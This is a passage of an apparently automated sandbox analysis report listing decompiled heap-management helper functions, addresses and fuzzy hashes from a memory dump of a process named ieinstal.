                        0x1ed94231
                        0x1ed94231
                        0x1ed94236
                        0x1ed9423d
                        0x1ed9423d
                        0x1ed94247

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb0b10586e0d7e200ceacf98c9e90c958164df3a2ec7585fe6085a7a84462a6c
                        • Instruction ID: 467fb69245ba89d39e7394965ecad46468800a12982923913ea5e4f2ec14dfa2
                        • Opcode Fuzzy Hash: fb0b10586e0d7e200ceacf98c9e90c958164df3a2ec7585fe6085a7a84462a6c
                        • Instruction Fuzzy Hash: 8BF0F27CC217A1CFCB90DBAA8AA7708B6B4FB44720F504A2AD0028A284C7345487DF22
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3A185, Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED3A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x1edf67e4 >= 0xa) {
					if(_t5 < 0x1edf6800 || _t5 >= 0x1edf6900) {
						return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E1ED20010(0x1edf67e0, _t5);
				}
			}





                        0x1ed3a190
                        0x1ed3a1a6
                        0x1ed3a1c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed3a192
                        0x1ed3a192
                        0x1ed3a19f
                        0x1ed3a19f

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6e820c3de580b79289cc2b3f1a4bf992d61b2c4eacdba29d0b1ef5abc6df2b3
                        • Instruction ID: 8f2bba4b0dce293340b909e831099ebd8190e0dc899a7770abeb17e294084757
                        • Opcode Fuzzy Hash: e6e820c3de580b79289cc2b3f1a4bf992d61b2c4eacdba29d0b1ef5abc6df2b3
                        • Instruction Fuzzy Hash: 60D02BA1E20040A6E62C87318950B1D2213ABC0B01F710F1DE0130FED5DB9098D282D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED316E0, Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED316E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E1ED31710(0x1edf67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L1ED24620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                        0x1ed316e8
                        0x1ed316ef
                        0x1ed316f3
                        0x1ed316fe
                        0x00000000
                        0x1ed31700
                        0x1ed3170d
                        0x1ed3170d
                        0x1ed316f2
                        0x1ed316f2
                        0x1ed316f2
                        0x1ed316f2

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6088f154315d6c389a964aa00ab1e4aae250c697f26677ac04f6fb26a67868f2
                        • Instruction ID: dc426352000ed7ff8dde07899b46d49d30dffc5ff99e0085baad00bd8073c3a8
                        • Opcode Fuzzy Hash: 6088f154315d6c389a964aa00ab1e4aae250c697f26677ac04f6fb26a67868f2
                        • Instruction Fuzzy Hash: 29D0A7B210014293DA1D8B319810B1432B29BC0B87F34066CF10749CC1CFA0EC92E458
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED853CA, Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED853CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E1ED1EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                        0x1ed853ca
                        0x1ed853ce
                        0x1ed853d9
                        0x1ed853de
                        0x1ed853e1
                        0x1ed853e1
                        0x1ed853e6
                        0x1ed853f3
                        0x00000000
                        0x1ed853f8
                        0x1ed853fb

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: f10a85d4ff3f434991e249debb0aef258452f638fea301d124545555c5248c9b
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: 5BE08C399006C09BCF02CB48C660F4EB7F6FB44B00F110514A4085F6A0C724EC00CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED335A1, Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED335A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E1ED1EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                        0x1ed335a1
                        0x1ed335a1
                        0x1ed335a5
                        0x1ed335ab
                        0x1ed335ab
                        0x1ed335b5
                        0x00000000
                        0x1ed335c1
                        0x1ed335b7

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: d8377a80a2f037536542079f862cd2feedef3f398b58f8b542c12a82f1a0fa51
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: 19D0A9B58111C09ADB01AB10C32475833B3BB0020AF782366A4560AA92CBBA8A0AC600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1AAB0, Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED1AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                        0x1ed1aab6
                        0x1ed1aabb
                        0x1ed6a442
                        0x00000000
                        0x1ed6a448
                        0x1ed6a454
                        0x1ed6a454
                        0x1ed1aac1
                        0x1ed1aac1
                        0x1ed1aac6
                        0x1ed1aac6

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: 03c250792cc5f858f6c18a9572b76c46a2d6a0c5b40f9cc7bfa89df66c2db7d3
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: 96D0E935352A81CFD616CB19D964B0573A5BB44B44FC50590E545CB765E62CE944CA01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED8A537, Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED8A537(intOrPtr _a4, intOrPtr _a8) {

				return L1ED28E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                        0x1ed8a553

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction ID: 206eaa03b55cf29c25a47dffce4cc88d5d42f4babb6e2c5f64ca9a9a80f18feb
                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction Fuzzy Hash: 6CC01236040148BBCB125E81CC01F05BB2AE794760F004410B5040A5608632E970D654
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0DB40, Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED0DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L1ED24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                        0x1ed0db4d
                        0x1ed0db54
                        0x1ed0db5f
                        0x1ed0db56
                        0x1ed0db56
                        0x1ed0db5c
                        0x1ed0db5c

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction ID: e02bcdadf71d56a3e05abeeb0a6ac2dd1d140b0d21057170e7e718e8bae62e64
                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction Fuzzy Hash: 36C08C30280A41ABEB224F20CD01B4036B1BB10B06F8505A06700DA0F4DB78E801EA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED336CC, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED336CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                        0x1ed336d2
                        0x1ed336e8
                        0x1ed336d4
                        0x1ed336e5
                        0x1ed336e5

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction ID: 503d40d020d00c9147c4ecfd2c248b4933affb10a97783aeeb276ed840d1da67
                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction Fuzzy Hash: 1DC08CB4250480ABD6054B208E00B107264A700A22FB407647220455E0DA28AC00D600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED176E2, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED176E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                        0x1ed176e4
                        0x00000000
                        0x1ed176f8
                        0x1ed176fd

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction ID: 500e14b5a978a8177bdb8dfa8ddf76a5f7828e3e30a47e06f63b8fc8f5aadc6e
                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction Fuzzy Hash: 44C08C741511C15BEB1A4708CE30B203651AB29648F8603ACEA110E4F1C378F842C308
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0AD30, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED0AD30(intOrPtr _a4) {

				return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                        0x1ed0ad49

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction ID: 4f10ac461d63d79bcf888a5f7ffd01565d161864f9bf27455c1995ba5dffe2af
                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction Fuzzy Hash: D9C08C32080288BBCB225A45CD00F017B29E7A0B60F010020B6040B6A18A32E860D698
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED23A1C, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED23A1C(intOrPtr _a4) {
				void* _t5;

				return L1ED24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                        0x1ed23a35

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction ID: 8e23c7ee2f8a6d43d7313f8be0d93a0d1e50d816f7877c73f83b93694546ab44
                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction Fuzzy Hash: A4C08C32080288BBC7129F41DC00F017B39E790B60F000020BA040A5A08632EC60D998
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED27D50, Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED27D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                        0x1ed27d56
                        0x1ed27d5b
                        0x1ed27d60
                        0x1ed27d5d
                        0x1ed27d5d
                        0x1ed27d5d

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction ID: fdaa75ddc5206f0ef8f7e53d3d0abbf21675003affb03701eeea80ab90b36f96
                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction Fuzzy Hash: 59B09234311982CFCE16DF28C080B0533E4BB44A44B8500E0E400CBA20D329E8008A00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED32ACB, Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED32ACB() {
				void* _t5;

				return E1ED1EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                        0x1ed32adc

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction ID: f7fbfae859e4193bc90aa0408431a10bf1ebf8f257e47fb46c650486975935f7
                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction Fuzzy Hash: A0B01236C10490CFCF02DF40D710B197331FB00750F054891A4012B9B0C328BC01CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED496D0, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca28f78f784b1722cbf0029dbe79a6e55d7f125c60c36cbce2a5346cfb2286c7
                        • Instruction ID: fc810a9bc08babe2b163915b635099e3703e76399a4436d0e70915f35fc5a640
                        • Opcode Fuzzy Hash: ca28f78f784b1722cbf0029dbe79a6e55d7f125c60c36cbce2a5346cfb2286c7
                        • Instruction Fuzzy Hash: 9790027120100847D501615A4404B5B00159BE4741F91C116E0114634D8656C8D27971
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49650, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5467c7c3a68e77295f1f972f9fe26734319f7ea7822f0d4e0f1afd4d4141cca7
                        • Instruction ID: b3d151e7aa1506ac7ebdcabcf62db5d85da0e3f035ecaeb49a65e1a5d9a691fd
                        • Opcode Fuzzy Hash: 5467c7c3a68e77295f1f972f9fe26734319f7ea7822f0d4e0f1afd4d4141cca7
                        • Instruction Fuzzy Hash: EF90027120504847D541715A4404A5B00259BD4745F91C111E0054674D96668DD6BAB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49610, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f04f39171c7cb3105526ee47d4e4025b3b8860fb168a769734f05d4b399945fb
                        • Instruction ID: 9f359be9e70cb36054f873c7cf3e68b2e9e63b85a8fb9819c266366f0fbda8ef
                        • Opcode Fuzzy Hash: f04f39171c7cb3105526ee47d4e4025b3b8860fb168a769734f05d4b399945fb
                        • Instruction Fuzzy Hash: 9590027160500807D551715A441475B00159BD4741F91C111E0014634D87968AD67AF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49FE0, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fcabd20ba90dfc633440f8217f672a2dd5c1a41c659bbb778c8b8f2adf07281f
                        • Instruction ID: 2a2e4c1837aa2a0b4869ec151b61a3f2ee5913a0bf11a6943295545170f76722
                        • Opcode Fuzzy Hash: fcabd20ba90dfc633440f8217f672a2dd5c1a41c659bbb778c8b8f2adf07281f
                        • Instruction Fuzzy Hash: D090027131114407D511615A840471B00159BD5641F91C511E0814538D86D688D27572
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4A770, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 947a42cdfcadb864606171ff67fd506dbc24ca6cdd8510df85b6191366808927
                        • Instruction ID: 8329011c5504d9d65e129b2470177a2d6ca7a05ee029f01b375ec6acf031d9df
                        • Opcode Fuzzy Hash: 947a42cdfcadb864606171ff67fd506dbc24ca6cdd8510df85b6191366808927
                        • Instruction Fuzzy Hash: 6A90027520504447D901655A5804A9B00159BD4745F91D511E041457CD869588E2B571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49770, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ce28a79be8e0b38d5833217bd3b6d9c4dd5b133b3e948b4ed60e7d63dd3d90c
                        • Instruction ID: b31e7322651774c3c2d26d6c381eb7879aeaa00a7a434fcbc79ec9dfbece01a8
                        • Opcode Fuzzy Hash: 9ce28a79be8e0b38d5833217bd3b6d9c4dd5b133b3e948b4ed60e7d63dd3d90c
                        • Instruction Fuzzy Hash: BD90026120504447D501655A5408A1B00159BD4645F91D111E1054575DC67688D2B571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49760, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad2a5465792d13b7338cb624c7f7b52ed7c0ebdd28e1c9ee57b274e820170bf0
                        • Instruction ID: 5b8cd3766b2af171fd5e3083b6a3e221041a57f7a30c1d565b8550bf07721988
                        • Opcode Fuzzy Hash: ad2a5465792d13b7338cb624c7f7b52ed7c0ebdd28e1c9ee57b274e820170bf0
                        • Instruction Fuzzy Hash: 8990027120100407D501615A550871B00159BD4641F91D511E0414538DD69788D27571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4A710, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79ad8dd788f8ff5071b60d11781a69a5621074769a57d322bba0fdf3445dff3b
                        • Instruction ID: 385d2a8f89d7644b527a6ce507fe1b53fd27dce064af94a491648799b823c76f
